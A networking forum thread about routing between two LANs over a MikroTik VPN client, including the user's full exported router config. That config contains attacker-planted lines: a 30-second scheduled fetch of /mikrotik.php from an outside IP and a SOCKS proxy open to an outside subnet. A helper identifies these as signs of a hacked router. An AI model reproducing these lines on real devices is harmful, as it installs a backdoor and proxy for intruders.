VNP and network access

0blar · Mon Sep 17, 2018 12:35 pm

Hi
I'm new here and i have some problem, hope you can help me
Here my configuration:

- 1st lan (192.168.0.0/24) : VPN server (fix IP address)+ others pc's
(no router just the FAI box)
gtw is 192.168.0.254

- 2nd lan (10.15.2.0/24): VPN client (dynamic IP address) + 4g modem + Mikrotik router (RB951UI-2HND) + switch + pc's
gtw is 10.15.2.1

Regarding the vpn configuration, i follow http://www.urosvovk.com/step-by-step-ho ... -routeros/

> interface ethernet print

Flags: X - disabled, R - running, S - slave
 #    NAME              MTU MAC-ADDRESS       ARP             SWITCH
 0 R  ether1           1500 64:D1:54:E3:7B:14 enabled         switch1
 1  S ether2-master    1500 64:D1:54:E3:7B:15 enabled         switch1
 2  S ether3           1500 64:D1:54:E3:7B:16 enabled         switch1
 3    ether4           1500 64:D1:54:E3:7B:17 enabled         switch1
 4 R  ether5           1500 64:D1:54:E3:7B:18 enabled         switch1

> /interface ovpn-client

 add name=ovpn-client1 connect-to=2.2.2.2 user=client1 password=123 disabled=no

> /ip route print

#      DST-ADDRESS        PREF-SRC        GATEWAY            DISTANCE
 0 A S  0.0.0.0/0                          pptp-out1                 1
 1 ADS  0.0.0.0/0                          pptp-out1                 0
 2   S  0.0.0.0/0                          192.168.8.1               1
 3 ADC  10.15.2.0/24       10.15.2.1       ether5                    0
 4 ADS  A.B.C.D/32                         192.168.8.1               0
 5 ADC  192.168.8.0/24     192.168.8.2     ether1                    0
 6 ADC  192.168.88.0/24    192.168.88.1    bridge                    0
 7 ADC  E.F.G.H/32         192.168.27.66   pptp-out1                 0

> /ip firewall nat print

Flags: X - disabled, I - invalid, D - dynamic
 0    ;;; defconf: masquerade
      chain=srcnat action=masquerade out-interface=ether1

 1    chain=srcnat action=masquerade out-interface=pptp-out1 log=no
      log-prefix=""

I can successfully ping all my devices located in the 1st lan from 2nd lan
I cannot ping any devices located in the 2nd lan from 1st lan (I cannot ping from 192.168.0.1 towards 10.15.2.3 or any other devices)

Can someone help me to allow 1st lan connect 2nd lan ?

Thank you

config 4g.png

0blar · Thu Sep 20, 2018 5:50 am

Any help ?

Bobstonom · Thu Sep 20, 2018 2:28 pm

How is it now, 0blar? Anyone PM'ed you yet about the solution?

0blar · Thu Sep 20, 2018 7:22 pm

Hi
No one yet

Sob · Fri Sep 21, 2018 3:39 am

What about routes? Does VPN server know where to look for 10.15.2.0/24?

0blar · Fri Sep 21, 2018 9:12 am

Here the route i have

> /ip route print

#      DST-ADDRESS        PREF-SRC        GATEWAY            DISTANCE
 0 A S  0.0.0.0/0                          pptp-out1                 1
 1 ADS  0.0.0.0/0                          pptp-out1                 0
 2   S  0.0.0.0/0                          192.168.8.1               1
 3 ADC  10.15.2.0/24       10.15.2.1       ether5                    0
 4 ADS  A.B.C.D/32                         192.168.8.1               0
 5 ADC  192.168.8.0/24     192.168.8.2     ether1                    0
 6 ADC  192.168.88.0/24    192.168.88.1    bridge                    0
 7 ADC  E.F.G.H/32         192.168.27.66   pptp-out1                 0

just to let you know that i'm a newbe with mikrotik

Thanks again

Sob · Fri Sep 21, 2018 6:23 pm

It looks like routes from 2nd LAN router (VPN client). I mean routes from 1st LAN router (VPN server).

0blar · Sat Sep 22, 2018 1:20 am

Hi
I don't have any router on the 1st lan (VPN server side), only ISP box with 192.168.0.254 private ip address
All device on 1st lan are 192.168.0.0/24

Sob · Sat Sep 22, 2018 2:30 am

Ok, not router, but VPN server needs to know where 10.15.2.0/24 is. Does it? Because if it doesn't, it will send all traffic to 10.15.2.0/24 to its default gateway and it has no chance to reach the destination (VPN client) from there.

When connecting from LAN2 to LAN1, masquerade rule on pptp-out1 make all traffic look like it's from the single IP address that VPN client got from VPN server, so it works, because VPN server obviously knows where that address is.

But to reach LAN2 from LAN1 (or VPN server itself), VPN server must have route to it, expressed as RouterOS config it would be:

/ip route
add dst-address=10.15.2.0/24 gateway=<VPN client address>

And then you also wouldn't need the masquerade rule anymore.

0blar · Sun Sep 23, 2018 11:48 am

Hi

but VPN server needs to know where 10.15.2.0/24 is. Does it?

NO

IP address of vpn client side is 192.168.27.66, so i did

/ip route
add dst-address=10.15.2.0/24 gateway=192.168.27.66

but no success

Sob · Sun Sep 23, 2018 5:36 pm

I hope I didn't confuse you with RouterOS syntax (I'm just used to it), you did this on ISP Box / VPN Server (in some equivalent way used by that device), right?

If so and it doesn't work, check what happens. Try to use Tools->Torch on client's VPN interface and watch for incoming packets to 10.15.2.x, while trying to connect there from server side. If there are some, the part with route worked. Then you can check if they pass through router and go to LAN interface where 10.15.2.0/24 is. If not, you can have a firewall blocking them.

If you don't succeed, you might want to run in Terminal:

/export hide-sensitive file=config

And post content of resulting config.rsc here.

0blar · Sun Sep 23, 2018 6:36 pm

you did this on ISP Box / VPN Server

I did this on mikrotik (client side)
I don't have any routeur on the 1st lan

Here the resulst of

/export hide-sensitive file=config

# sep/23/2018 17:12:00 by RouterOS 6.43.2
# software id = 7X1Z-41C2
#
# model = 951Ui-2HnD
# serial number = XXXXXXXXXXX
/interface bridge
add admin-mac=AA:AA:AA:AA:AA:AA auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether1 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether2 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
    ether2-master
set [ find default-name=ether3 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether4 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether5 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-b/g/n channel-width=20/40mhz-Ce \
    disabled=no distance=indoors frequency=auto mode=ap-bridge ssid=\
    MikroTik-E37B19 wireless-protocol=802.11
/interface pptp-client
add add-default-route=yes allow=mschap1,mschap2 connect-to=ISP_PUBLIC_IP \
    default-route-distance=0 disabled=no max-mru=1490 max-mtu=1490 name=\
    pptp-out1 user=xxxxxx
/interface vlan
add interface=ether5 name=cam vlan-id=10
add interface=ether5 name=lan vlan-id=12
add interface=ether5 name=srv vlan-id=11
/interface list
add exclude=dynamic name=discover
add name=mactel
add name=mac-winbox
add name=WAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp_pool0 ranges=10.15.0.2-10.15.0.254
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=lan lease-time=4w2d name=\
    dhcp1
/interface bridge port
add bridge=bridge comment=defconf interface=ether2-master
add bridge=bridge comment=defconf interface=wlan1
add bridge=bridge interface=ether3
/ip neighbor discovery-settings
set discover-interface-list=discover
/interface list member
add interface=ether2-master list=discover
add interface=ether3 list=discover
add interface=ether4 list=discover
add interface=ether5 list=discover
add interface=wlan1 list=discover
add interface=bridge list=discover
add interface=lan list=discover
add interface=srv list=discover
add interface=cam list=discover
add interface=bridge list=mactel
add interface=bridge list=mac-winbox
add interface=ether1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=ether2-master network=\
    192.168.88.0
add address=10.15.2.1/24 interface=ether5 network=10.15.2.0
add address=192.168.8.2/24 interface=ether1 network=192.168.8.0
/ip arp
add address=10.15.2.4 interface=ether1
/ip cloud
set ddns-enabled=yes
/ip dhcp-server network
add address=10.15.0.0/24 dns-server=10.15.0.1 gateway=10.15.0.1
/ip dns
set allow-remote-requests=yes servers=4.2.2.2
/ip dns static
add address=192.168.88.1 name=router
/ip firewall filter
add action=accept chain=input protocol=icmp
add action=accept chain=input connection-state=related
add action=accept chain=input connection-state=established
add action=accept chain=input comment="SSH Access" dst-port=22 protocol=tcp
/ip firewall mangle
add action=mark-routing chain=prerouting new-routing-mark=VPN passthrough=yes \
    src-address=10.15.2.1-10.15.2.254
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" \
    out-interface=ether1
add action=masquerade chain=srcnat out-interface=pptp-out1
/ip route
add check-gateway=ping distance=1 gateway=pptp-out1 routing-mark=VPN
add distance=1 gateway=192.168.8.1
add distance=1 dst-address=10.15.2.0/24 gateway=192.168.27.66
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system clock
/system routerboard settings
set silent-boot=no
/system scheduler
add interval=1m name=UpdateDNS on-event=Update_WAN policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-time=startup
add interval=5m name=test_schedule on-event=test policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=jan/30/2018 start-time=09:35:42
add interval=30s name=schedule4_ on-event=script4_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add dont-require-permissions=no name=Update_WAN owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=\
    "/ip dns cache flush\r\
    \n/ip cloud  force-update"
add dont-require-permissions=no name=test owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="#\
    \_Update DNS on Freedns.afraid.org\r\
    \n:global host \"freedns.afraid.org\"\r\
    \n:global url \"https://freedns.afraid.org/dynamic/update.php\?c3N2T"\r\
    \n\r\
    \n/ip dns cache flush\r\
    \n/tool fetch url=\$url host=\$host"
add dont-require-permissions=no name=script4_ owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.16 port=2008 src-path=/mikrotik.php mode=http keep-resul\
    t=no"
/tool mac-server
set allowed-interface-list=mactel
/tool mac-server mac-winbox
set allowed-interface-list=mac-winbox

Something strange i see 95.154.216.16 ip, i don't know it

Sob · Sun Sep 23, 2018 8:07 pm

It won't help you on client side, it's the VPN server that must know where 10.15.2.0/24 subnet is. And currently doesn't. So you must find a way how to add this route on VPN server. Or if you'd in fact need to access only some service in 10.15.2.0/24 network (and not the whole network), you could do it using port forwarding. In other words, devices from 1st LAN would be connecting to IP address of VPN client (192.168.27.66) and you'd forward port(s) from there to 10.15.2.x.

And that adress you don't know, downloading /mikrotik.php and enabled SOCKS proxy, I'm affraid I have some bad news for you, it looks like hacked router, see Winbox vulnerability: please upgrade. Not very surprising, since you have no firewall (you have some rules, but they allow absolutely everything).

0blar · Mon Sep 24, 2018 9:29 am

Thanks for your help

VNP and network access

VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Re: VNP and network access

Who is online